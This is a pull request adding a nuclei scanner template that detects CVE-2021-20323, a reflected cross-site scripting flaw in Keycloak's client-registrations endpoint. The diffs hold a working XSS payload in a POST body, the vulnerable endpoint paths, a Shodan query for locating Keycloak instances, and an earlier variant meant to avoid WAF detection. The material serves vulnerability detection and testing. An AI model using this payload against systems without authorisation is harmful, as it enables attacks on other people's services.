### PR TITLE
Add template for CVE-2021-20323

### DIFF
--- a/cves/2021/CVE-2021-20323.yaml
+++ b/cves/2021/CVE-2021-20323.yaml
@@ -15,6 +15,9 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20323
   classification:
     cve-id: CVE-2021-20323
+  metadata:
+    verified: true
+    shodan-query: html:"Keycloak"
   tags: cve,cve2021,keycloak,xss
 
 requests:
@@ -42,3 +45,7 @@ requests:
         part: header
         words:
           - text/html
+
+      - type: status
+        status:
+          - 400

--- a/cves/2021/CVE-2021-20323.yaml
+++ b/cves/2021/CVE-2021-20323.yaml
@@ -29,7 +29,7 @@ requests:
       - "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
 
     headers:
-        Content-Type: application/json
+      Content-Type: application/json
 
     body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
 

--- a/cves/2021/CVE-2021-20323.yaml
+++ b/cves/2021/CVE-2021-20323.yaml
@@ -1,0 +1,51 @@
+id: CVE-2021-20323
+
+info:
+  name: Keycloak before 18.0.0 - Reflected XSS on clients-registrations endpoint 
+  author: ndmalc
+  severity: medium
+  description: Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
+  reference:
+    - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20323
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2013577
+    - https://access.redhat.com/security/cve/CVE-2021-20323
+    - https://github.com/ndmalc/CVE-2021-20323
+    - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-20323
+    cwe-id: CWE-79
+  tags: keycloak,xss,reflected,unauth,cve,cve2021
+
+variables:
+# Variable to set the realm on which the request is executed
+# Can be usefull to manually set something else than master as it could be path restricted
+# nuclei does not allow user provided variable
+  realm: "master"
+
+requests:
+  - method: POST
+    headers:
+        Content-Type: application/json
+    path:
+        # Currently no nice way to have conditionnal testing
+      - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/default"
+      - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/openid-connect"
+      - "{{BaseURL}}/realms/{{realm}}/clients-registrations/default"
+      - "{{BaseURL}}/realms/{{realm}}/clients-registrations/openid-connect"
+    body: "{\"TestFlag\":1}"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+        # Uses a non-XSS match to avoid WAF detection
+      - type: word
+        words:
+          - "Unrecognized field \"TestFlag\""
+        part: body
+      - type: word
+        words:
+          - "Content-Type: text/html"
+        part: header

--- a/cves/2021/CVE-2021-20323.yaml
+++ b/cves/2021/CVE-2021-20323.yaml
@@ -1,51 +1,44 @@
 id: CVE-2021-20323
 
 info:
-  name: Keycloak before 18.0.0 - Reflected XSS on clients-registrations endpoint 
+  name: Keycloak < 18.0.0 - Cross Site Scripting
   author: ndmalc
   severity: medium
-  description: Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
+  description: |
+    Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
   reference:
     - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-20323
     - https://bugzilla.redhat.com/show_bug.cgi?id=2013577
     - https://access.redhat.com/security/cve/CVE-2021-20323
     - https://github.com/ndmalc/CVE-2021-20323
     - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20323
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
     cve-id: CVE-2021-20323
-    cwe-id: CWE-79
-  tags: keycloak,xss,reflected,unauth,cve,cve2021
-
-variables:
-# Variable to set the realm on which the request is executed
-# Can be usefull to manually set something else than master as it could be path restricted
-# nuclei does not allow user provided variable
-  realm: "master"
+  tags: cve,cve2021,keycloak,xss
 
 requests:
   - method: POST
+    path:
+      - "{{BaseURL}}/auth/realms/master/clients-registrations/default"
+      - "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
+      - "{{BaseURL}}/realms/master/clients-registrations/default"
+      - "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
+
     headers:
         Content-Type: application/json
-    path:
-        # Currently no nice way to have conditionnal testing
-      - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/default"
-      - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/openid-connect"
-      - "{{BaseURL}}/realms/{{realm}}/clients-registrations/default"
-      - "{{BaseURL}}/realms/{{realm}}/clients-registrations/openid-connect"
-    body: "{\"TestFlag\":1}"
+
+    body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-        # Uses a non-XSS match to avoid WAF detection
       - type: word
-        words:
-          - "Unrecognized field \"TestFlag\""
         part: body
-      - type: word
         words:
-          - "Content-Type: text/html"
+          - 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
+
+      - type: word
         part: header
+        words:
+          - text/html


### PR DESCRIPTION
### Template / PR Information

Little to no public information on how to test CVE-2021-20323. I wrote a POC on https://github.com/ndmalc/CVE-2021-20323 and a nuclei template here for easy reuse.

- Added CVE-2021-20323

### Template Validation

I've validated this template locally?
- [ X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

Template can easily be tested by using a vulnerable Keycloak container as described here: https://github.com/ndmalc/CVE-2021-20323/tree/main/tests
